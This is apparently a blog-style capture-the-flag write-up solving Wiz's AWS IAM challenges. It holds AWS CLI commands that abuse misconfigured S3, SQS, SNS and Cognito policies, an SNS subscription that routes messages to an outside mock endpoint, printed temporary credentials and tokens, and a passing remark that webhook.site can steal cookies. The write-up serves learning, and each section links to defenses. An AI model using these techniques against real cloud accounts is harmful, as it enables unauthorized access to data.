# Hackwekend Session 5 - Cloud Security (AWS IAM Policy)
![image](https://hackmd.io/_uploads/BJBuR4oZA.png)
> Yo, Hello Hello @everyone. It's been a good week to bring back Hackwekend. Continuously, today we will learn and solve challenge CTF of Wiz.io about Cloud Security, Target today is IAM. Let digest bruh :smiling_face_with_smiling_eyes_and_hand_covering_mouth:
![image](https://hackmd.io/_uploads/S1R-jQHMC.png)
Challenge Link: [BigIAMChallenge](https://bigiamchallenge.com)
## Challenge 1: Buckets of Fun
> Description: We all know that public buckets are risky. But can you find the flag?
![image](https://hackmd.io/_uploads/rk11FcsW0.png)
At first, let talk about the challenge. Base on the description and IAM Policy we know about the flag will stay on Bucket, therefore we need to know about Bucket, How the Bucket work, digest inside that.
![image](https://hackmd.io/_uploads/Hkr0sqibA.png)
### Analysis
Learn more about S3 with [What is S3 ?](https://docs.aws.amazon.com/AmazonS3/latest/userguide/Welcome.html)
> **(TL;DR)** *Amazon Simple Storage Service (Amazon S3) is an object storage service that offers industry-leading scalability, data availability, security, and performance.**Use Amazon S3 to store and protect any amount of data** for a range of use cases, such as data lakes, websites, mobile applications, backup and restore, archive, enterprise applications, IoT devices, and big data analytics. Amazon **S3 provides management features** so that you can **optimize, organize, and configure access to your data** to meet your specific business, organizational, and compliance requirements.*
I can brief about the `S3`, It's kind simple location for put your file, data and anything into that and It's totally on `AWS`. It means on this challenge you just figure out how to get the data from bucket
### Solve and retrieve the flag
You will need some help about [aws s3 documentaion](https://docs.aws.amazon.com/cli/latest/reference/s3/)
Base on the IAM Policy, you have role to `get` and `list` the bucket, it mean you need to do
First of all, you need to list s3 objects for find the what flag file you want, and you can see we have additions end point `files`. Do trigger `s3 ls` command and you will know flag file
```bash!
aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/
```
![image](https://hackmd.io/_uploads/S1zFMjoWA.png)
The flag1.txt is exposing, next step is reading contents inside `flag1.txt`, use `cp` command to take others work :smiling_face_with_smiling_eyes_and_hand_covering_mouth:
```bash!
aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt -
```
![image](https://hackmd.io/_uploads/BJoOQii-R.png)
Flag: {wiz:exposed-xxxxxxxxx-as-usual}
### Conclusion
![image](https://hackmd.io/_uploads/B18dNoob0.png)
> With first challenge, It looks basicly, you can learn how to list and get contents inside bucket object. So with S3 you expose to Internet and not protect anything, your secret can be leaked. Thus, you need to apply the policy into s3 for secure what access can perform
Learn more about that with [Security best practices for Amazon S3](https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html)
## Challenge 2: Google Analytics
**Description**: *We created our own analytics system specifically for this challenge. We think it's so good that we even used it on this page. What could go wrong? Join our queue and get the secret flag.*
![image](https://hackmd.io/_uploads/H1gSBoo-C.png)
### Analysis
![image](https://hackmd.io/_uploads/r1Hk8siZ0.png)
Next stage, on this challenge you need to know about `sqs`, **Message queue service** of AWS.
>**(TL;DR)** *Amazon Simple Queue Service (Amazon SQS) offers a secure, durable, and available hosted queue that lets you integrate and decouple distributed software systems and components. Amazon SQS offers common constructs such as dead-letter queues and cost allocation tags. It provides a generic web services API that you can access using any programming language that the AWS SDK supports.*
Simplely, you need to figure out what `sqs` working, receive message in the queue and read the contents inside, Flag will expose
### Solve and retrieve the flag
I just read couple walkthrough, you can find the hard way to play this challenge via [this write-up](https://pswalia2u.medium.com/bigiamchallenge-aws-iam-challenges-ded45cb983f2#:~:text=with%20AWS%20credentials.-,Challenge%202,-The%20second%20challenge)
With me, i just solve this challenge kind simple way, but you need to know about IAM policy we have `send-message` & `receive-message`. Googling about this stuff, you will have [documentation](https://docs.aws.amazon.com/cli/latest/reference/sqs/)
First of all, I try to retrive what message we got from queue, maybe interesting is inside and right expectation you will found the hidden URL, with `receive-message` command *(FACT: This command is finding inside the documentation of `receive-message` command, guess and truth :smile:)*
```bash!
aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2 --attribute-names All --message-attribute-names All --max-number-of-messages 10
```
![image](https://hackmd.io/_uploads/SJyL_iobA.png)
Access Body URL for doing access bucket to reach flag contents
```bash!
curl https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html
```
![image](https://hackmd.io/_uploads/SyauOjoZ0.png)
Flag: {wiz:you-are-xxxxxxx-of-the-queue}
### Conclusion
> Through this challenge, you will learn how about `sqs` service of AWS, maybe `receive` is enough for this challenge but you can try another to create queue message with `send`. And another meaning, you need to secure and put IAM for your service on AWS, It will best practice for securing any service
Learn more about with [Security in Amazon SQS](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/sqs-security.html)
## Challenge 3: Enable Push Notifications
**Description**: *We got a message for you. Can you get it?*
![image](https://hackmd.io/_uploads/ry85KoiWC.png)
### Analysis
![image](https://hackmd.io/_uploads/BJXyqjsbC.png)
On this challenge, we will learn about a new service `SNS`, **Simple Notification Service** of AWS
> **(TL;DR)** *Amazon Simple Notification Service (Amazon SNS) is a managed service that provides message delivery from publishers to subscribers (also known as producers and consumers). Publishers communicate asynchronously with subscribers by sending messages to a topic, which is a logical access point and communication channel. Clients can subscribe to the SNS topic and receive published messages using a supported endpoint type, such as Amazon Data Firehose, Amazon SQS, AWS Lambda, HTTP, email, mobile push notifications, and mobile text messages (SMS).*
It requires you submit publisher for topic and send it to your server, and maybe contents is staying on this messsage return.
### Solve and retrieve the flag
To do the job like expectation, you need to know about manipulation the request, It means you make a mock server where you can receive `GET` and `POST` request to server. Some application which you can use on situation like
1. [Beeceptor](https://beeceptor.com/) : API Mocking
2. [Webhook.site](https://webhook.site/) : *Generates free, unique URLs and e-mail addresses and lets you see everything that’s sent there instantly. (Usage: Steal cookies, bypass authorized, ...)*
On this situaion, I don't know why i can use `webhook.site` to receive message submit from subscribe, so `Beeceeptor` come like coincident instead for `webhooksite`
![image](https://hackmd.io/_uploads/BJsSCk3ZC.png)
To subscribe endpoint for topic, you can figure out the method with [documentation](https://docs.aws.amazon.com/sns/latest/dg/sns-create-subscribe-endpoint-to-topic.html), it use `sns subscribe` and submit nofication can be `beeceptor` or `webhook.site`
Subscribe with `webhook.site` (Very long to receive message confirmation)
![image](https://hackmd.io/_uploads/rys5kg3-0.png)
Subscribe with `beeceptor` (Sorry not have image because of the broken of beeceptor in written process)
```bash!
aws sns subscribe \
--topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications \
--protocol https \
--notification-endpoint https://hissss.free.beeceptor.com/@tbic.wiz.io
```
Wait some few second, you will receive this message with request about subscription confirmation
```json
{
"Type": "SubscriptionConfirmation",
"MessageId": "f627ce34-b444-467b-85da-16e7552ce235",
"Token": "2336412f37fb687f5d51e6e2425ba1f2557c425dcc2daea6d66fe3659c617229f8ef892c4e6966c741337fe049776a677ffb1a60e1a3535c75b49b3be3feabce2cc2da9a993314cdb3da62541cc2f124c645e9a2698a36fc1243b88b827d15f345d4aa097b5fb518c9fa1d8db2aeba67f9a20b54b950f36eff8883de9e5c15bf",
"TopicArn": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
"Message": "You have chosen to subscribe to the topic arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications.\nTo confirm the subscription, visit the SubscribeURL included in this message.",
"SubscribeURL": "https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription&TopicArn=arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications&Token=2336412f37fb687f5d51e6e2425ba1f2557c425dcc2daea6d66fe3659c617229f8ef892c4e6966c741337fe049776a677ffb1a60e1a3535c75b49b3be3feabce2cc2da9a993314cdb3da62541cc2f124c645e9a2698a36fc1243b88b827d15f345d4aa097b5fb518c9fa1d8db2aeba67f9a20b54b950f36eff8883de9e5c15bf",
"Timestamp": "2024-04-25T07:50:45.994Z",
"SignatureVersion": "1",
"Signature": "rE1iclhXRmTYOX1n1G+vifwWfIoFt1u0R8N0sRjN4GdYnTh/Jq904DN6tKCYw5AcMIezss6Qe2iW7U9zvjzJAcX9QPBOvmQl6sPYon8/ygs8MhIoGskl3Vf3DsbdIgnZmoRVHJgFZRPrFV+kzMZa3i3YpG1iEjyAf1cM0igtLd5nXF43Je9XPOLiqyGH9QDDS8cM0HCWVBuGPETBexfcItioclDBQ8VKMTWawAtmdqhPTu9qrwcvDTsdGhPJ5qbKcpGt4bG4SxlpXVD/bZ3y9xGm0RltrksQ0kT8iuuVMdxDHewM7I7ZZstYEn2T7mSb95q2G1zPWXkyyao+KXYW+Q==",
"SigningCertURL": "https://sns.us-east-1.amazonaws.com/SimpleNotificationService-60eadc530605d63b8e62a523676ef735.pem"
}
```
Use subcribe URL to apply the confirm
```bash!
curl https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription&TopicArn=arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications&Token=2336412f37fb687f5d51e6e2425ba1f2557c425dcc2daea6d66fe3659c617229f8ef892c4e6966c741337fe049776a677ffb1a60e1a3535c75b49b3be3feabce2cc2da9a993314cdb3da62541cc2f124c645e9a2698a36fc1243b88b827d15f345d4aa097b5fb518c9fa1d8db2aeba67f9a20b54b950f36eff8883de9e5c15bf
```
Wait some few second, message return the flag on your `webhook` or `beeceptor` site
Flag: {wiz:always-xxxxxxx-asterisks}
### Conclusion
> Through this challenge, you will learn and figure out how the `sns` work, how can you subscribe the topic and get the message return with `mock-site` or `webhook-site`.
Learn more about how to protect [Amazon SNS security best practices](https://docs.aws.amazon.com/sns/latest/dg/sns-security-best-practices.html)
## Challenge 4: Admin only?
> We learned from our mistakes from the past. Now our bucket only allows access to one specific admin user. Or does it?
![image](https://hackmd.io/_uploads/HJbk4e3bA.png)
### Analysis
![image](https://hackmd.io/_uploads/S1Yfrl3ZR.png)
This challenge ask you about list and get the contents in `S3` but more secure, You can learn about `s3` on first challenge
When check the condition, you have additional ARN with `ForAllValues`, and you need to bypass and list the bucket
### Solve and retrieve the flag
After focus about the additional ARN, I figure out we need to bypas over s3 authentication, and solution can be [Diving Deeply into IAM Policy Evaluation – Highlights from AWS re:Inforce IAM433](https://ermetic.com/blog/aws/diving-deeply-into-iam-policy-evaluation-highlights-from-aws-reinforce-session-iam433/)
> The problem is the usage of the ForAllValues operator! When **the key** is **absent** from the authorization context (as with a role that is not tagged with the key “Team”), **the condition evaluates to true**. Formally speaking this is because the empty set is a subset of all sets. “For all values in A x is true” is true if the group A is the empty set.
It mean when we not set the sign request, credential is not submit with `--no-sign-request` flag, and luckyly `s3` bucket support to bypass this situation :smiling_face_with_smiling_eyes_and_hand_covering_mouth:
```bash!
aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request
```
![image](https://hackmd.io/_uploads/HJcYrgnW0.png)
Get the name file, submit the `cp` command to getting the contents
```bash!
aws s3 cp s3://thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt --no-sign-request -
```
![image](https://hackmd.io/_uploads/Hyn6Bx2-0.png)
Flag: {wiz:principal-arn-xxx-xxx-xxx-you-think}
### Conclusion
> Through this challenge, not anything is very secure, you can make misconfiguration and mistake will occur, very carefully when use `ForAllValues`.
To secure that, you need to read [Authorization context: Principal evaluation](https://ermetic.com/blog/aws/diving-deeply-into-iam-policy-evaluation-highlights-from-aws-reinforce-session-iam433/#:~:text=virtual%20boundary%20principal.-,Authorization%20context%3A%20Principal%20evaluation,-The%20actual%20principal) to understand how IAM should be apply or not, figure out the different and find the best match condition which require for your service
## Challenge 5: Do I know you?
**Description**: We configured AWS Cognito as our main identity provider. Let's hope we didn't make any mistakes.
![image](https://hackmd.io/_uploads/SkfGDlhb0.png)
### Analysis
![image](https://hackmd.io/_uploads/BknRwx2WC.png)
On this challenge, you will work with new service identity `cognito` of AWS
> **(TL;DR)** *Amazon Cognito is an Amazon Web Services product that controls user authentication and access for mobile applications on internet-connected devices. The service saves and synchronizes end-user data, which enables an application developer to focus on writing code instead of building and managing the back-end infrastructure. This can accelerate the mobile application development process.*
It mean you need to use `cognito` to authentication your shell or get identity for access to private bucket
### Solve and retrieve the flag
First of all, you need to **check out the raw of script**, IDK about it but it's CTF challenge and why you need to do this work, and some thing indentity hide in background. Use F12 to view that or `viewsource://`. The `identity-pool-id` will expose
![image](https://hackmd.io/_uploads/BkO1Fx2bA.png)
```json
IdentityPoolId: "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
```
After view policy, you know you have full role of aws cognito it mean you need to use cognito for escalate permission, and yeah to get identity with cognito you can use `get-id` to read the `IdentityID`
```bash
aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
```
![image](https://hackmd.io/_uploads/SJTOYx3ZR.png)
```json
{
"IdentityId": "us-east-1:157d6171-xxxxx-xxxx-xxxx-70ee00d8a205"
}
```
Get the IdentityID, It's really a good new. Reaching to next step to get full profile to authentication applications, it mean use can use `IdentityID` for get `credentials` for cognito user, with command `get-credentials-for-identity`
```bash
aws cognito-identity get-credentials-for-identity --identity-id us-east-1:157d6171-eeb7-c4b4-26e9-70ee00d8a205
```
![image](https://hackmd.io/_uploads/Bk16FxnbC.png)
```json
{
"IdentityId": "us-east-1:157d6171-eeb7-c4b4-26e9-70ee00d8a205",
"Credentials": {
"AccessKeyId": "ASIARK7LBOHXOIRTUPHO",
"SecretKey": "seu7OTd212HGes3bbYo0ZfE9MXukchMDTtPlZPE7",
"SessionToken": "IQoJb3JpZ2luX2VjEKn//////////wEaCXVzLWVhc3QtMSJGMEQCIDjCawLxtiPwlu6pnUH7VEb77v59A5jt+G9oVZpWX1/KAiAcKr+LNP0E4hgqDnm5hPDwuvAx+MsLG4oTyG2/4R+JlyrRBQjy//////////8BEAA
aDDA5MjI5Nzg1MTM3NCIMh2JDoW8l0odiidmPKqUFsbOWeCSlBCrJu10OZkyVs+fk4U6F6OHrub0z+zRtw2JStCgXxC4C3o9Dhp01Pz8TNQ9/4zyE8NOZBsSE1aPGlHlwNJuykK1p0QMVXsxTVMfoNzU9NNFlAZGqGY6jFrxSrci0M2FxaQCr6z5bTh4
tEPBCS/8PAr6sKel3Lv5GbILTNxXgsDi4yxT94VNaqKDlNPAdQ2+ujgS87u2vZh6Tw2yk0fFQlPVri57RRl6YUvjwsN9tTHx7mq5qUy/tqkrW60BERDTbw7aheTXaFb5hqLi+xatmqgHoMM5PY6hdaEpOzB2EpzWqZ4bd489fExOqKoH0I+gXYd8kRCG
8vdLr5G7C3MHNocC+IXtzggyP/rq9h288aN+zu3+8kmmGqQDAHp/J33TcX3EQCaqHJsjzwIlhebf5XAWAdmtRo8OFAsZi/9x41YAJPmYfrVQgrCKiFHh55cTYsg9icR1D5QIn0b7vNOx3I17K3ETpwIZQ968cAhLEsuhBlo3T442IBy5nYEYMpG3MGV9
Rd9qrvcpQMqKaasE3ewY47XFvRf3fHHBTojXSYZnQRElPk2iYICowUcc4SzF1/e4FT/KinmZQHR/h455G2f7/J5k7UMhQfk/AvVcrCjeWu1Qh+czY6AdJqVKcPCqSNWznWZL3OPXNTCP7YeSYfnBCLJLumlQFXpo7lgKD2469eW0bI6OreF1+bwmGaEI
s+aiG45Nb42FV8c/bF3Gsf0H7p6MHwptH3UOuu1piyB0ApyEWt6dWgxd6PFm7X50wbrTp5vpHPMwZHzuFVYjBG3ycWIam4+nXGhzzBVh0mlbTAev0xap9hPHgg6uy64BhZr9crXexPvcH6gIZ7aUNLov1PwfWLpqvB25wNNLZaJ1zFu5S0tMHPn3gYmh
kLPEwpfO5sQY63wLC7Q8QvTOKH+gQCY9KkWzz7EgKyRIPPn06P2sYGgFqYZHl5UHxXXDWi1QVEUaIN6bcfDg0qohntu6LoygH1q0SyB7ZSkp6Rkuv5VEyWs7ju6pFxdiE2JalUA7JQWEnHw1I6XUutegYPxIS/Cq/JKA4Zs14xU3pIHTHsK091pT49Eq
eA+g0xVOPTWatAIQsukrHJ8DpP7+3jIaUEdkEvmzi+Q8l0xf6ERRXPn72cAVO4xcbibnF4i6hTNoBLD2FzKeEDD3NtONBlJAfkIsxspL/RuBiuJjCBujm9dGoZD68oCyM7AT0LMELvwEYhY4JugdDAS1gXeXMn1ESlq6PR86Dt+r2q/Nvz4R9vx6Es8U
pdT7DrD0eRSmTp3Z8Z/xg1sn8E/H3mqQVLa+sez4XwVzf/XhUFieS+N2ulACFqA8gME369Amq4hl/DJgC+31srQA2Qcd6BzcZLQqDloZiURY=",
"Expiration": 1714325429.0
}
}
```
You can save this credential into shell or overwrite environment to apply this role for current shell, but not like dream, you must be run `configure` to set this up :laughing: :laughing: :laughing:
```bash
aws configure --profile challenge5
```
It tough to said that you will need aws on your shell to perform this command because you will not allow to run this command on that shell, IDK (Couple day ago i can but currently it not, waste much time for figure out the reaso )
Easily, Save some the token and export them to environment for authentication, very easily read about that on [documentation](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html)
![image](https://hackmd.io/_uploads/Bko_9lnZ0.png)
After export env variable for authentication AWS-cli, you can check about aws role with `sts` command
```bash!
aws sts get-caller-identity
```
![image](https://hackmd.io/_uploads/S1eY3ycZ0.png)
So other works is pretty easily, you can list bucket contents and read that flag
```bash
# List obj in bucket
aws s3 ls s3://wiz-privatefiles
```
![image](https://hackmd.io/_uploads/r1nxjghWC.png)
```bash
# Get the contents from flag.txt
aws s3 cp s3://wiz-privatefiles/flag1.txt -
```
![image](https://hackmd.io/_uploads/BJxXix3-C.png)
Flag: {wiz:incognito-xxxx-xxx-suspicious}
### Conclusion
> Awesome challenge, you learn about how the mobile or external can authentication with `cognito` of aws, learn about how we can use `congito` to create the variables for connect `AWS`
Learn more about how to secure `cognito` with [Security in Amazon Cognito](https://docs.aws.amazon.com/cognito/latest/developerguide/security.html)
## Challenge 6: One final push
**Description**: *Anonymous access no more. Let's see what can you do now. Now try it with the authenticated role: `arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role`*
![image](https://hackmd.io/_uploads/SyKm2xnZR.png)
### Analysis
On this challenge, It's a level up of Challenge 5, you need to figure out the way to assume webidentity - another way to authentication aws with sepecify role
![image](https://hackmd.io/_uploads/SJMGAl3W0.png)
### Solve and retrieve the flag
First of all, with **word of challenge** how to assume the role, you need to figure out this challenge that kind same as challenge 5. Easily, you have the `identity-pool-id` in IAM Policy, Just need to `get-id` from `cognito`
```bash
aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
```
![image](https://hackmd.io/_uploads/B1A2Ren-C.png)
```json
{
"IdentityId": "us-east-1:157d6171-eef0-cec9-1180-962565110331"
}
```
Next step, get `open-id` for assume role with `web-identity` instead of get the credentials, because you will not have permission (I think so :smile:) like challenge 5
![image](https://hackmd.io/_uploads/Sy45ebnWR.png)
Experiment: Walkthrough step like challenge 5, and you will get the `identity` like this
![image](https://hackmd.io/_uploads/S1p3J-h-A.png)
![image](https://hackmd.io/_uploads/rywNe-3W0.png)
You will sad and disappointed about that situation, you will fail to authentication with `get-credentials-for-identity`, it require `web-identity`
![image](https://hackmd.io/_uploads/HJjAlZnZC.png)
First of all, you need to know requirement of assume role commmand, [assume-role-with-web-identity](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-web-identity.html)
It require, `--role-arn <value> --role-session-name <value> --web-identity-token <value>`
- role-arn : `arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role`
- role-session-name `<base-on-decision>`
- web-identity-token: You need to learn how to use this with [documentation](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html)
![image](https://hackmd.io/_uploads/HJGx9-5WA.png)
So It mean you can use `0Auth 2.0 token` or `openid connect id token` to provide webidentity. It mean you can use cognito-identity to provide your `openid token`. You will use [`get-open-id-token`](https://docs.aws.amazon.com/cli/latest/reference/cognito-identity/get-open-id-token.html) to generate openid token for your shell
```bash
aws cognito-identity get-open-id-token --identity-id us-east-1:157d6171-eef0-cec9-1180-962565110331
```
![image](https://hackmd.io/_uploads/ByNc--3Z0.png)
```json
{
"IdentityId": "us-east-1:157d6171-eef0-cec9-1180-962565110331",
"Token": "eyJraWQiOiJ1cy1lYXN0LTE1IiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWVmMC1jZWM5LTExODAtOTYyNTY1MTEwMzMxIiwiYXVkIjoidXMtZW
FzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3M
TQzMjQ0NDEsImlhdCI6MTcxNDMyMzg0MX0.N2fsrW6atXMq42TW4BqnDLGLwVm4I33RqPR5gIm5WUBS8buJh7m-4cbsDPCAr6xcHC6TmB0eMYe3MRUyZaPkjjd2meWCCB438meSVaU35s87m0-Cs8VZmVvJcKE-Rn-Ol5rm
8nL0hVt2NUG9y4gGYW4gvUh7SBfj-wvRAF_giAwmV6sqLabP2uX32aSxZbFdFdL-XAdnEM-KA5mdRdxyqyqCJG18ZPfqZ_9bVpuCKsr3t42UEcqvVS0DUZwYVJCx4qX1i88aTFvDbVsBS9OU6T_BX3fOhlWBjLF1VTlTs0n
bGkfFnNVzwB8_dzAYZ0vWTADg-R_8PY9BAtWZkG26zQ"
}
```
Done, next step we will assume currently shell to role with `web-identity` token
```bash
aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name chal6 --web-identity-token "eyJraWQiOiJ1cy1lYXN0LTE1IiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWVmMC1jZWM5LTExODAtOTYyNTY1MTEwMzMxIiwiYXVkIjoidXMtZW
FzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3M
TQzMjQ0NDEsImlhdCI6MTcxNDMyMzg0MX0.N2fsrW6atXMq42TW4BqnDLGLwVm4I33RqPR5gIm5WUBS8buJh7m-4cbsDPCAr6xcHC6TmB0eMYe3MRUyZaPkjjd2meWCCB438meSVaU35s87m0-Cs8VZmVvJcKE-Rn-Ol5rm
8nL0hVt2NUG9y4gGYW4gvUh7SBfj-wvRAF_giAwmV6sqLabP2uX32aSxZbFdFdL-XAdnEM-KA5mdRdxyqyqCJG18ZPfqZ_9bVpuCKsr3t42UEcqvVS0DUZwYVJCx4qX1i88aTFvDbVsBS9OU6T_BX3fOhlWBjLF1VTlTs0n
bGkfFnNVzwB8_dzAYZ0vWTADg-R_8PY9BAtWZkG26zQ"
```
> **(Warning)** *I make it but at least, format is terrible so you need to careful about that, one more thing you need to concern because `IdentityID` and `Token` have limit time*
![image](https://hackmd.io/_uploads/HkmAzZ3W0.png)
Like chal5, export env for authentication your aws-cli. after that you will assume role completely
![image](https://hackmd.io/_uploads/BynrmZ3-R.png)
After export env variable, use `sts` to check your authentication
![image](https://hackmd.io/_uploads/B1K_Q-nbR.png)
Completely all step above, you need to define what s3 to open and contents of bucket, easily like challenge 1
```bash
# Find the s3 of root directory
aws s3 ls s3://
```
![image](https://hackmd.io/_uploads/BkLpmbn-C.png)
Access and read content of flag inside the last challenge
```bash
aws s3 ls s3://wiz-privatefiles-x1000/
aws s3 cp s3://wiz-privatefiles-x1000/flag2.txt -
```
![image](https://hackmd.io/_uploads/Bk1bVb2WA.png)
Flag: {wiz:open-sesame-xxx-xxx-xxx-say-openid}
### Conclusion
> Through this challenge, you can learn a new way to authentication you account with assume role with `web-identity`, cool methodology and easily to understand.
# Conclusion
![image](https://hackmd.io/_uploads/Bk0ZGz5WC.png)
> That all for today, I hope you and me learn a newthing about IAM, Policy and methodology for authentication your application. AWS is very cool stuff cloud environment with unique technical, with me AWS can bring you more knowledge about Identity, Authentication, Service and new awesome theory. :smoking:
What a hackwekend is ending, and can be on next session we will continue learning Cloud security with Wiz.io about **K8s Networking**. See you again on that, Stay safe and enjoy hacking, be back soon :smiling_face_with_smiling_eyes_and_hand_covering_mouth:
![image](https://hackmd.io/_uploads/S1Yx8Wn-A.png)